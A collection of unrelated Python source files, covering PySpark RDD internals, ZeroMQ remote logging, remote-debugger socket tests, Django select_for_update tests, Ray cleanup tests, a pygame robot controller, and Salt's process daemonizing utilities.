self._jrdd_val = python_rdd.asJavaRDD()
return self._jrdd_val
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(globs=globs,optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
remote_logging.py
|
import logging
import threading
import zmq
from zmq.log.handlers import PUBHandler
from context import get_context
logger = logging.getLogger("LoggingConfig")
__log_context__ = {}
class CustomFormatter(logging.Formatter):
"""Logging Formatter to add colors and count warning / errors"""
grey = "\x1b[38;21m"
cyan = "\x1b[36;21m"
yellow = "\x1b[33;21m"
red = "\x1b[31;21m"
bold_red = "\x1b[31;1m"
reset = "\x1b[0m"
form = "%(name)s | %(asctime)s | %(message)s"
db_form = "%(name)s | %(asctime)s | %(message)s | (%(filename)s:%(lineno)d)"
FORMATS = {
logging.DEBUG: grey + db_form + reset,
logging.INFO: cyan + form + reset,
logging.WARNING: yellow + form + reset,
logging.ERROR: red + db_form + reset,
logging.CRITICAL: bold_red + db_form + reset,
}
def format(self, record):
log_fmt = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_fmt)
return formatter.format(record)
def add_custom_log_handler():
base_logger = logging.getLogger()
base_logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler()
sh.setLevel(level=logging.DEBUG)
sh.setFormatter(CustomFormatter())
base_logger.addHandler(sh)
def set_zmq_log_handler():
context = get_context()
connect_address = context.get("remote_log_connect")
ctx = zmq.Context().instance()
log_sock = ctx.socket(zmq.PUB)
log_sock.connect(connect_address)
zmq_log_handler = PUBHandler(log_sock)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.addHandler(zmq_log_handler)
logger.socket = log_sock
__log_context__["log_sock"] = log_sock
zmq_log_handler.setFormatter(CustomFormatter())
if hasattr(zmq_log_handler, "setRootTopic"):
topic = context.get("remote_log_topic", "FedableLogger")
zmq_log_handler.setRootTopic(topic)
return logger
def cleanup_logging():
if "log_sock" in __log_context__:
__log_context__["log_sock"].close()
logging.shutdown()
def start_logging_proxy_thread():
t = threading.Thread(target=start_logging_proxy, daemon=True,)
t.start()
return t
def start_logging_proxy():
ctx = zmq.Context().instance()
context = get_context()
bind_address_front = context.get("remote_log_bind_front", "tcp://*8880")
bind_address_back = context.get("remote_log_bind_back", "tcp://*8881")
frontend = ctx.socket(zmq.SUB)
try:
frontend.bind(bind_address_front)
except zmq.ZMQError as e:
logging.warning("Unable to bind remote log proxy. Address in use?")
logging.error(e)
return
frontend.setsockopt(zmq.SUBSCRIBE, b"")
# Socket facing services
backend = ctx.socket(zmq.PUB)
try:
backend.bind(bind_address_back)
except zmq.ZMQError as e:
logging.warning("Unable to bind remote log proxy. Address in use?")
logging.error(e)
return
zmq.proxy(frontend, backend)
def configure_logging(enable_remote):
if enable_remote:
context = get_context()
if context.get("remote_log_proxy", True):
start_logging_proxy_thread()
set_zmq_log_handler()
base_logger = logging.getLogger()
base_logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler()
sh.setLevel(level=logging.DEBUG)
sh.setFormatter(CustomFormatter())
base_logger.addHandler(sh)
logging.getLogger("matplotlib").setLevel(logging.WARNING)
if enable_remote:
logger.info("Configuring remote logging")
else:
logger.info("Not configuring remote logging")
|
test_socket.py
|
import inspect
import multiprocessing
import select
import socket
import unittest
import pexpect
import six
import sdb
HOST = '127.0.0.1'
class TestSocketTrace(unittest.TestCase):
def setUp(self):
# call set_trace() in a child process so we can connect to it
p = multiprocessing.Process(target=self.set_trace)
p.start()
# listen for UDP announcement packets
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((HOST, 6899))
r, w, x = select.select([sock], [], [])
for i in r:
self.port = i.recv(1024).decode('utf-8')
def set_trace(self):
sdb.Sdb(notify_host=HOST, colorize=False).set_trace()
class TestBasicConnectivity(TestSocketTrace):
def test_udp_announcement(self):
assert 6899 <= int(self.port) < 7000
child = pexpect.spawn('telnet', [HOST, self.port])
child.sendline('c')
child.expect([pexpect.EOF])
assert not child.isalive()
class TestControlCommands(TestSocketTrace):
def assert_command_yields(self, command, expected_lines):
stdout = six.BytesIO() if six.PY3 else six.StringIO()
child = pexpect.spawn('telnet', [HOST, self.port])
child.logfile_read = stdout
child.sendline(command)
child.sendline('c')
child.expect([pexpect.EOF])
assert not child.isalive()
for line in expected_lines:
assert line.encode('utf-8') in stdout.getvalue()
def test_list(self):
self.assert_command_yields(
'list',
[l.strip() for l in inspect.getsourcelines(self.set_trace)[0]]
)
def test_bt(self):
self.assert_command_yields(
'bt',
'> ' + __file__
)
def test_locals_alias(self):
self.assert_command_yields(
'?',
"['__return__', 'self']"
)
def test_completion_alias(self):
self.assert_command_yields(
'sdb?',
"'SDB_HOST',"
)
def test_sourcelines_alias(self):
self.assert_command_yields(
'sdb.listen??',
['def listen():']
)
def test_tab_completion(self):
self.assert_command_yields(
'sdb.set_tr<!TAB!>',
'sdb.set_trace()'
)
def test_command_repeat(self):
self.assert_command_yields(
'3p "Hello, World!"',
'Hello, World!\nHello, World!\nHello, World!\n'
)
def test_print_undefined(self):
self.assert_command_yields(
'undefined',
"NameError: name 'undefined' is not defined"
)
def test_print_empty_string(self):
self.assert_command_yields('""', '""\n')
def test_print_nonetype(self):
self.assert_command_yields('None', 'None\n')
def test_setlines(self):
stdout = six.BytesIO() if six.PY3 else six.StringIO()
child = pexpect.spawn('telnet', [HOST, self.port])
child.logfile_read = stdout
# signal that we only want 10 lines of output, and then read the buffer
child.sendline('lines 10')
child.expect([pexpect.TIMEOUT], timeout=0.1)
# the next list call should only return 10 lines of output
stdout = six.BytesIO() if six.PY3 else six.StringIO()
child.logfile_read = stdout
child.sendline('l')
child.sendline('c')
child.expect([pexpect.EOF])
assert not child.isalive()
# strip off everything before the "c" continue command
lines = stdout.getvalue().splitlines()
assert len(lines[:lines.index(
'c' if six.PY2 else b'c'
)]) == 10
|
tests.py
|
import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import (
City, CityCountryProxy, Country, EUCity, EUCountry, Person, PersonProfile,
)
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
# This is executed in autocommit mode so that code in
# run_select_for_update can see this data.
self.country1 = Country.objects.create(name='Belgium')
self.country2 = Country.objects.create(name='France')
self.city1 = City.objects.create(name='Liberchies', country=self.country1)
self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
self.person_profile = PersonProfile.objects.create(person=self.person)
# We need another database connection in transaction to test that one
# connection issuing a SELECT ... FOR UPDATE will block.
self.new_connection = connection.copy()
def tearDown(self):
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
self.new_connection.close()
def start_blocking_transaction(self):
self.new_connection.set_autocommit(False)
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.cursor.close()
self.new_connection.rollback()
self.new_connection.set_autocommit(True)
def has_for_update_sql(self, queries, **kwargs):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = connection.ops.for_update_sql(**kwargs)
return any(for_update_sql in query['sql'] for query in queries)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_no_key_update')
def test_update_sql_generated_no_key(self):
"""
The backend's FOR NO KEY UPDATE variant appears in generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(no_key=True))
self.assertIs(self.has_for_update_sql(ctx.captured_queries, no_key=True), True)
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
"""
The backend's FOR UPDATE OF variant appears in the generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.select_related(
'born__country',
).select_for_update(
of=('born__country',),
).select_for_update(
of=('self', 'born__country')
))
features = connections['default'].features
if features.select_for_update_of_column:
expected = [
'select_for_update_person"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_person', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self',)))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_eucountry"."country_ptr_id']
else:
expected = ['select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self', 'country_ptr',)))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucountry"."country_ptr_id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucountry', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_related_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_eucountry"."country_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_nested_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country__country_ptr',),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_multilevel_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(
of=('country_ptr', 'country_ptr__entity_ptr'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_country"."entity_ptr_id',
'select_for_update_entity"."id',
]
else:
expected = ['select_for_update_country', 'select_for_update_entity']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_proxy_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(CityCountryProxy.objects.select_related(
'country',
).select_for_update(
of=('country',),
))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_country"."entity_ptr_id']
else:
expected = ['select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
self.assertEqual(values, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values_list(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
self.assertEqual(values, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
"""
select_for_update(of=['self']) when the only columns selected are from
related tables.
"""
with transaction.atomic():
values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
self.assertEqual(values, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
"""
If skip_locked is specified, the locked row is skipped resulting in
Person.DoesNotExist.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'skip_locked': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
a database backend that supports FOR UPDATE but not NOWAIT.
"""
with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
on a database backend that supports FOR UPDATE but not SKIP LOCKED.
"""
with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
a database backend that supports FOR UPDATE but not OF.
"""
msg = 'FOR UPDATE OF is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(of=('self',)).get()
@skipIfDBFeature('has_select_for_no_key_update')
@skipUnlessDBFeature('has_select_for_update')
def test_unsuported_no_key_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR NO KEY UPDATE... is run
on a database backend that supports FOR UPDATE but not NO KEY.
"""
msg = 'FOR NO KEY UPDATE is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(no_key=True).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
"""
FieldError is raised if a non-relation field is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, born__country, '
'born__country__entity_ptr.'
)
invalid_of = [
('nonexistent',),
('name',),
('born__nonexistent',),
('born__name',),
('born__nonexistent', 'born__name'),
]
for of in invalid_of:
with self.subTest(of=of):
with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
with transaction.atomic():
Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
"""
FieldError is raised if a relation field that is not followed in the
query is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, profile.'
)
for name in ['born__country', 'died', 'died__country']:
with self.subTest(name=name):
with self.assertRaisesMessage(FieldError, msg % name):
with transaction.atomic():
Person.objects.select_related(
'born', 'profile',
).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_inheritance_of_argument_raises_error_ptr_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, %s.'
)
with self.assertRaisesMessage(
FieldError,
msg % 'country, country__country_ptr, country__country_ptr__entity_ptr',
):
with transaction.atomic():
EUCity.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
with self.assertRaisesMessage(FieldError, msg % 'country_ptr, country_ptr__entity_ptr'):
with transaction.atomic():
EUCountry.objects.select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_proxy_of_argument_raises_error_proxy_field_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, country, country__entity_ptr.'
)
with self.assertRaisesMessage(FieldError, msg):
with transaction.atomic():
CityCountryProxy.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
"""
Reverse OneToOneFields may be included in of=(...) as long as NULLs
are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
"""
with transaction.atomic():
person = Person.objects.select_related(
'profile',
).exclude(profile=None).select_for_update(of=('profile',)).get()
self.assertEqual(person.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
features_class = connections['default'].features.__class__
attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
with mock.patch(attribute_to_patch, return_value=True):
with transaction.atomic():
self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
"""
A TransactionManagementError is raised
when a select_for_update query is executed outside of a transaction.
"""
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
"""
No TransactionManagementError is raised
when select_for_update is invoked outside of a transaction -
only when the query is executed.
"""
people = Person.objects.all().select_for_update()
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(people)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
with transaction.atomic():
qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
self.assertEqual(qs[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
with transaction.atomic():
person = Person.objects.select_for_update(**kwargs).get()
person.name = 'Fred'
person.save()
except (DatabaseError, Person.DoesNotExist) as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
A thread running a select_for_update that accesses rows being touched
by a similar operation on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.is_alive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Running a raw query which can't obtain a FOR UPDATE lock raises
the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
# Connection cannot be closed on Oracle because cursor is still
# open.
if connection.vendor != 'oracle':
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
query = Person.objects.select_for_update()
self.assertEqual(router.db_for_write(Person), query.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
with transaction.atomic():
person = Person.objects.select_for_update().get(name='Reinhardt')
self.assertEqual(person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
"""
Subqueries should respect ordering as an ORDER BY clause may be useful
to specify a row locking order to prevent deadlocks (#27193).
"""
with transaction.atomic():
qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
self.assertIn('ORDER BY', str(qs.query))
|
test_monitors.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import pytest
import subprocess
import time
import ray
from ray.tests.utils import run_and_get_output
def _test_cleanup_on_driver_exit(num_redis_shards):
stdout = run_and_get_output([
"ray",
"start",
"--head",
"--num-redis-shards",
str(num_redis_shards),
])
lines = [m.strip() for m in stdout.split("\n")]
init_cmd = [m for m in lines if m.startswith("ray.init")]
assert 1 == len(init_cmd)
redis_address = init_cmd[0].split("redis_address=\"")[-1][:-2]
max_attempts_before_failing = 100
# Wait for monitor.py to start working.
time.sleep(2)
def StateSummary():
obj_tbl_len = len(ray.global_state.object_table())
task_tbl_len = len(ray.global_state.task_table())
func_tbl_len = len(ray.global_state.function_table())
return obj_tbl_len, task_tbl_len, func_tbl_len
def Driver(success):
success.value = True
# Start driver.
ray.init(redis_address=redis_address)
summary_start = StateSummary()
if (0, 1) != summary_start[:2]:
success.value = False
# Two new objects.
ray.get(ray.put(1111))
ray.get(ray.put(1111))
attempts = 0
while (2, 1, summary_start[2]) != StateSummary():
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
success.value = False
break
@ray.remote
def f():
ray.put(1111) # Yet another object.
return 1111 # A returned object as well.
# 1 new function.
attempts = 0
while (2, 1, summary_start[2] + 1) != StateSummary():
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
success.value = False
break
ray.get(f.remote())
attempts = 0
while (4, 2, summary_start[2] + 1) != StateSummary():
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
success.value = False
break
ray.shutdown()
success = multiprocessing.Value('b', False)
driver = multiprocessing.Process(target=Driver, args=(success, ))
driver.start()
# Wait for client to exit.
driver.join()
# Just make sure Driver() is run and succeeded.
assert success.value
# Check that objects, tasks, and functions are cleaned up.
ray.init(redis_address=redis_address)
attempts = 0
while (0, 1) != StateSummary()[:2]:
time.sleep(0.1)
attempts += 1
if attempts == max_attempts_before_failing:
break
assert (0, 1) == StateSummary()[:2]
ray.shutdown()
subprocess.Popen(["ray", "stop"]).wait()
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="Hanging with the new GCS API.")
def test_cleanup_on_driver_exit_single_redis_shard():
_test_cleanup_on_driver_exit(num_redis_shards=1)
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="Hanging with the new GCS API.")
def test_cleanup_on_driver_exit_many_redis_shards():
_test_cleanup_on_driver_exit(num_redis_shards=5)
_test_cleanup_on_driver_exit(num_redis_shards=31)
|
keyboard_ctrl.py
|
"""
使用键盘控制机器人
- a/s/d/f: 移动
- q/e: 转向
"""
import sys
import os
import numpy as np
import pygame
import time
import threading
# add parent directory to import path
sys.path.append(os.path.split(os.path.abspath(os.path.dirname(__file__)))[0])
import rmepy
MOVE_SPEED = 1.5
ROTATE_SPEED = 600
CMD_SEND_FREQ = 60
THRESHOLD = 50
running = True
r = rmepy.Robot()
r.start()
r.video.start()
time.sleep(0.1)
# r.video.log.level = 'INFO'
r.connection.log.level = 'WARNING'
speed = (0, 0, 0)
def key_handler(k):
global running, r, speed, l_pos, z
speed = [0, 0, 0]
if k[pygame.K_w]:
# forward
speed[0] = MOVE_SPEED
if k[pygame.K_s]:
# back
speed[0] = -MOVE_SPEED
if k[pygame.K_d]:
# right
speed[1] = -MOVE_SPEED
if k[pygame.K_a]:
# left
speed[1] = MOVE_SPEED
if k[pygame.K_ESCAPE]:
# exit
running = False
speed[2] = min(max(-pygame.mouse.get_rel()[0], -THRESHOLD), THRESHOLD) / THRESHOLD * ROTATE_SPEED
def ctrl_task():
global speed
while running:
r.chassis.set_speed(*speed)
time.sleep(1/CMD_SEND_FREQ)
if __name__ == "__main__":
ctrl_thread = threading.Thread(target=ctrl_task)
ctrl_thread.start()
pygame.init()
display = pygame.display.set_mode((1080, 720))
clock = pygame.time.Clock()
pygame.event.set_grab(True)
pygame.mouse.set_visible(False)
update_frame = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
keys = pygame.key.get_pressed()
key_handler(keys)
# Draw image
if update_frame:
temp = r.video.get_frame(timeout=1)
if temp is not None:
frame = np.rot90(temp, 1)
surf = pygame.surfarray.make_surface(frame)
display.blit(surf, (0, 0))
pygame.display.flip()
update_frame = not update_frame
clock.tick(65)
pygame.quit()
|
process.py
|
"""
Functions for daemonizing and otherwise modifying running processes
"""
import contextlib
import copy
import errno
import functools
import inspect
import io
import json
import logging
import multiprocessing
import multiprocessing.util
import os
import queue
import signal
import socket
import subprocess
import sys
import threading
import time
import salt.defaults.exitcodes
import salt.log.setup
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.versions
from salt.ext.tornado import gen
log = logging.getLogger(__name__)
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import setproctitle
HAS_SETPROCTITLE = True
except ImportError:
HAS_SETPROCTITLE = False
def appendproctitle(name):
"""
Append "name" to the current process title
"""
if HAS_SETPROCTITLE:
current = setproctitle.getproctitle()
if current.strip().endswith("MainProcess"):
current, _ = current.rsplit("MainProcess", 1)
setproctitle.setproctitle("{} {}".format(current.rstrip(), name))
def daemonize(redirect_out=True):
"""
Daemonize a process
"""
# Avoid circular import
import salt.utils.crypt
try:
pid = os.fork()
if pid > 0:
# exit first parent
salt.utils.crypt.reinit_crypto()
os._exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error("fork #1 failed: %s (%s)", exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# decouple from parent environment
os.chdir("/")
# noinspection PyArgumentList
os.setsid()
os.umask(0o022) # pylint: disable=blacklisted-function
# do second fork
try:
pid = os.fork()
if pid > 0:
salt.utils.crypt.reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error("fork #2 failed: %s (%s)", exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
salt.utils.crypt.reinit_crypto()
